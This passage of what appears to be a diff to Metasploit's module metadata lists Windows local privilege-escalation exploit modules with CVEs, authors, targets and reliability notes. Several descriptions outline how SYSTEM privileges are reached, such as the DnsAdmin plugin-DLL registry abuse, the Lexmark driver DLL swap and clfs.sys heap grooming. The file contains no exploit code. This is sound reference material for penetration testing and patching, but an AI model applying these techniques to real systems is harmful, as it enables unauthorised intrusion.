], + "mod_time": "2023-11-28 14:35:26 +0000", + "path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2023_21768_afd_lpe": { + "name": "Ancillary Function Driver (AFD) for WinSock Elevation of Privilege", + "fullname": "exploit/windows/local/cve_2023_21768_afd_lpe", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-01-10", + "type": "exploit", + "author": [ + "chompie", + "b33f", + "Yarden Shafir", + "Christophe De La Fuente" + ], + "description": "A vulnerability exists in the Windows Ancillary Function Driver for Winsock\n (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. 
Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is\n possible to create an arbitrary kernel Write-Where primitive, which can be used\n to manipulate internal I/O ring structures and achieve local privilege\n escalation.\n\n This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in\n January 2023 updates).", + "references": [ + "CVE-2023-21768", + "URL-https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768", + "URL-https://github.com/yardenshafir/IoRingReadWritePrimitive" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 11 22H2 x64" + ], + "mod_time": "2023-04-04 09:48:51 +0000", + "path": "/modules/exploits/windows/local/cve_2023_21768_afd_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2023_21768_afd_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2023_28252_clfs_driver": { + "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability", + "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver", + "aliases": [], + "rank": 400, + "disclosure_date": "2023-04-11", + "type": "exploit", + "author": [ + "Ricardo Narvaja", + "Esteban.kazimirow", + "jheysel-r7" + ], + "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n The clfs.sys driver contains a function CreateLogFile that is used to create\n open and edit '*.blf' (base log format) files. 
Inside a .blf file there are multiple blocks of data which\n contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n The exploits creates a controlled memory space by first looping over the CreatePipe function to\n to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n This is a very brief and high overview description of what the exploit is actually doing. 
For a more detailed and in\n depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).", + "references": [ + "CVE-2023-28252", + "URL-https://github.com/fortra/CVE-2023-28252" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-09-11 13:10:57 +0000", + "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2023_28252_clfs_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_30085_cloud_files": { + "name": "Windows Cloud File Mini Filer Driver Heap Overflow", + "fullname": "exploit/windows/local/cve_2024_30085_cloud_files", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-12-19", + "type": "exploit", + "author": [ + "Alex Birnberg", + "ssd-disclosure", + "bwatters-r7" + ], + "description": "This module exploits the Windows Cloud Files Mini FIlter Driver cldflt.sys on Windows workstation versions\n 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.", + "references": [ + "CVE-2024-30085", + "URL-https://attackerkb.com/topics/EHiwxpT2Dp/cve-2024-30085", + "URL-https://ssd-disclosure.com/ssd-advisory-cldflt-heap-based-overflow-pe/", + "URL-https://starlabs.sg/blog/2024/all-i-want-for-christmas-is-a-cve-2024-30085-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2025-01-10 16:14:32 +0000", + "path": "/modules/exploits/windows/local/cve_2024_30085_cloud_files.rb", + "is_install_path": true, + "ref_name": 
"windows/local/cve_2024_30085_cloud_files", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_30088_authz_basep": { + "name": "Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes", + "fullname": "exploit/windows/local/cve_2024_30088_authz_basep", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-11", + "type": "exploit", + "author": [ + "tykawaii98", + "jheysel-r7" + ], + "description": "CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,\n Windows 11 and Windows Server 2022.\n\n The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when\n the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the\n kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure\n directly to the user supplied pointed. 
It then calls `RtlCopyUnicodeString` and\n `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading\n to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.", + "references": [ + "URL-https://github.com/tykawaii98/CVE-2024-30088", + "CVE-2024-30038" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2025-03-13 13:14:13 +0000", + "path": "/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2024_30088_authz_basep", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_35250_ks_driver": { + "name": "Windows Access Mode Mismatch LPE in ks.sys", + "fullname": "exploit/windows/local/cve_2024_35250_ks_driver", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-11", + "type": "exploit", + "author": [ + "AngelBoy", + "varwara", + "jheysel-r7" + ], + "description": "The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.\n There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,\n Windows 11, Windows Server 2022.", + "references": [ + "URL-https://github.com/varwara/CVE-2024-35250", + "URL-https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/", + "URL-https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html", + "CVE-2024-35250" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + 
"autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-11-06 09:13:51 +0000", + "path": "/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2024_35250_ks_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/dnsadmin_serverlevelplugindll": { + "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation", + "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-08", + "type": "exploit", + "author": [ + "Shay Ber", + "Imran E. Dawoodjee " + ], + "description": "This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the\n `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`\n named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service\n will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended\n when using a UNC path.\n\n Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,\n the DNS server on the target will not be able to restart. 
Similarly if a UNC share is not utilized, and\n users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus\n after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the\n `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key on the target computer may point to an nonexistant DLL,\n which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for\n this module for advice on how to resolve this issue should it occur.\n\n This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows\n Server version up to and including Windows Server 2019.", + "references": [ + "URL-https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "URL-https://adsecurity.org/?p=4064", + "URL-http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb", + "is_install_path": true, + "ref_name": "windows/local/dnsadmin_serverlevelplugindll", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/docker_credential_wincred": { + "name": "Docker-Credential-Wincred.exe Privilege Escalation", + "fullname": "exploit/windows/local/docker_credential_wincred", + "aliases": [], + "rank": 0, + "disclosure_date": 
"2019-07-05", + "type": "exploit", + "author": [ + "Morgan Roman", + "bwatters-r7" + ], + "description": "This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.", + "references": [ + "CVE-2019-15752", + "URL-https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/local/docker_credential_wincred.rb", + "is_install_path": true, + "ref_name": "windows/local/docker_credential_wincred", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc": { + "name": "Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation", + "fullname": "exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-25", + "type": "exploit", + "author": [ + "Chris Lyne", + "Matteo Malvica", + "bcoles " + ], + "description": "Druva inSync client for Windows exposes a network service on TCP\n port 6064 on the local network interface. 
inSync versions 6.6.3\n and prior do not properly validate user-supplied program paths\n in RPC type 5 messages, allowing execution of arbitrary commands\n as SYSTEM.\n\n This module has been tested successfully on inSync versions\n 6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).", + "references": [ + "CVE-2019-3999", + "CVE-2020-5752", + "EDB-48400", + "EDB-48505", + "EDB-49211", + "PACKETSTORM-157493", + "PACKETSTORM-157802", + "PACKETSTORM-160404", + "URL-https://www.tenable.com/security/research/tra-2020-12", + "URL-https://www.tenable.com/security/research/tra-2020-34", + "URL-https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py", + "URL-https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/gog_galaxyclientservice_privesc": { + "name": "GOG GalaxyClientService Privilege Escalation", + "fullname": "exploit/windows/local/gog_galaxyclientservice_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-04-28", + "type": "exploit", + "author": [ + "Joe Testa " + ], + "description": "This module will send arbitrary file_paths to the GOG GalaxyClientService, which will be executed\n with SYSTEM privileges (verified on GOG Galaxy Client v1.2.62 and v2.0.12; prior versions are\n also likely 
affected).", + "references": [ + "URL-https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/", + "CVE-2020-7352" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows (Dropper)" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/gog_galaxyclientservice_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ikeext_service": { + "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL", + "fullname": "exploit/windows/local/ikeext_service", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-10-09", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. 
It requires an insecure bin path to plant the DLL payload.", + "references": [ + "URL-https://www.htbridge.com/advisory/HTB23108", + "URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ikeext_service.rb", + "is_install_path": true, + "ref_name": "windows/local/ikeext_service", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ipass_launch_app": { + "name": "iPass Mobile Client Service Privilege Escalation", + "fullname": "exploit/windows/local/ipass_launch_app", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-12", + "type": "exploit", + "author": [ + "h0ng10" + ], + "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. 
The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.", + "references": [ + "CVE-2015-0925", + "URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ipass_launch_app.rb", + "is_install_path": true, + "ref_name": "windows/local/ipass_launch_app", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/lenovo_systemupdate": { + "name": "Lenovo System Update Privilege Escalation", + "fullname": "exploit/windows/local/lenovo_systemupdate", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-04-12", + "type": "exploit", + "author": [ + "Michael Milvich", + "Sofiane Talmat", + "h0ng10" + ], + "description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service provides the possibility to execute arbitrary\n commands as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. 
Please, note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.", + "references": [ + "OSVDB-121522", + "CVE-2015-2219", + "URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/lenovo_systemupdate.rb", + "is_install_path": true, + "ref_name": "windows/local/lenovo_systemupdate", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/lexmark_driver_privesc": { + "name": "Lexmark Driver Privilege Escalation", + "fullname": "exploit/windows/local/lexmark_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-07-15", + "type": "exploit", + "author": [ + "Jacob Baines", + "Shelby Pace", + "Grant Willcox" + ], + "description": "Various Lexmark Universal Printer drivers as listed at advisory TE953\n allow low-privileged authenicated users to elevate their privileges to\n SYSTEM on affected Windows systems by modifying the XML file at\n C:\\ProgramData\\\\Universal Color Laser.gdl\n to replace the DLL path to unires.dll with a malicious DLL path.\n\n When C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is\n then used to add the printer to the affected system, PrintIsolationHost.exe,\n a Windows process running as NT AUTHORITY\\SYSTEM, will inspect the\n C:\\ProgramData\\\\Universal Color Laser.gdl file and will\n load the malicious DLL from the path specified in the file. 
This which will\n result in the malicious DLL executing as NT AUTHORITY\\SYSTEM.\n\n Once this module is finished, it will use the prnmngr.vbs script\n to remove the printer it added.", + "references": [ + "CVE-2021-35449", + "URL-http://support.lexmark.com/index?page=content&id=TE953", + "URL-https://github.com/jacob-baines/concealed_position", + "URL-https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/lexmark_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/linqpad_deserialization_persistence": { + "name": "LINQPad Deserialization Exploit", + "fullname": "exploit/windows/local/linqpad_deserialization_persistence", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-12-03", + "type": "exploit", + "author": [ + "msutovsky-r7 ", + "James Williams" + ], + "description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. 
The data gets deserialized every time the app restarts.", + "references": [ + "URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad", + "CVE-2024-53326" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2025-05-06 08:43:57 +0000", + "path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/linqpad_deserialization_persistence", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/microfocus_operations_privesc": { + "name": "Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation", + "fullname": "exploit/windows/local/microfocus_operations_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-28", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge\n Manager and Operations Bridge Reporter.\n An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and\n then access it without authentication by making a request to the OBM / OBR server.\n This will result in automatic code execution as SYSTEM. 
This module has been tested on\n OBM 2020.05 and OBR 10.40, but it should work out of the box on earlier versions too.\n Note that it is only exploitable on Windows installations.", + "references": [ + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md", + "CVE-2020-11858", + "CVE-2020-11855", + "ZDI-20-1326", + "ZDI-20-1217" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Micro Focus Operations Bridge Manager (Windows) <= 2020.05", + "Micro Focus Operations Bridge Reporter (Windows) <= 10.40" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/microfocus_operations_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/microfocus_operations_privesc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/mov_ss": { + "name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/mov_ss", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-05-08", + "type": "exploit", + "author": [ + "Nick Peterson", + "Nemanja Mulasmajic", + "Can Bölük ", + "bwatters-r7" + ], + "description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to 
execute the final\n payload in order to gain remote code execution.", + "references": [ + "CVE-2018-8897", + "EDB-44697", + "BID-104071", + "URL-https://github.com/can1357/CVE-2018-8897/", + "URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/mov_ss.rb", + "is_install_path": true, + "ref_name": "windows/local/mov_ss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/mqac_write": { + "name": "MQAC.sys Arbitrary Write Privilege Escalation", + "fullname": "exploit/windows/local/mqac_write", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-22", + "type": "exploit", + "author": [ + "Matt Bergin", + "Spencer McIntyre" + ], + "description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.", + "references": [ + "CVE-2014-4971", + "EDB-34112", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/mqac_write.rb", + "is_install_path": true, + "ref_name": "windows/local/mqac_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"exploit_windows/local/ms10_015_kitrap0d": { + "name": "Windows SYSTEM Escalation via KiTrap0D", + "fullname": "exploit/windows/local/ms10_015_kitrap0d", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-01-19", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "HD Moore", + "Pusscat", + "OJ Reeves" + ], + "description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.", + "references": [ + "CVE-2010-0232", + "OSVDB-61854", + "MSB-MS10-015", + "EDB-11199", + "URL-https://seclists.org/fulldisclosure/2010/Jan/341" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2K SP4 - Windows 7 (x86)" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb", + "is_install_path": true, + "ref_name": "windows/local/ms10_015_kitrap0d", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms10_092_schelevator": { + "name": "Windows Escalate Task Scheduler XML Privilege Escalation", + "fullname": "exploit/windows/local/ms10_092_schelevator", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-09-13", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, In a default\n configuration, normal users can read and write the task files that they have\n created. 
By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.", + "references": [ + "OSVDB-68518", + "CVE-2010-3338", + "BID-44357", + "MSB-MS10-092", + "EDB-15589" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Vista / 7 / 2008 (Dropper)", + "Windows Vista / 7 / 2008 (Command)" + ], + "mod_time": "2022-08-19 15:19:28 +0000", + "path": "/modules/exploits/windows/local/ms10_092_schelevator.rb", + "is_install_path": true, + "ref_name": "windows/local/ms10_092_schelevator", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms11_080_afdjoinleaf": { + "name": "MS11-080 AfdJoinLeaf Privilege Escalation", + "fullname": "exploit/windows/local/ms11_080_afdjoinleaf", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-11-30", + "type": "exploit", + "author": [ + "Matteo Memelli", + "Spencer McIntyre" + ], + "description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. 
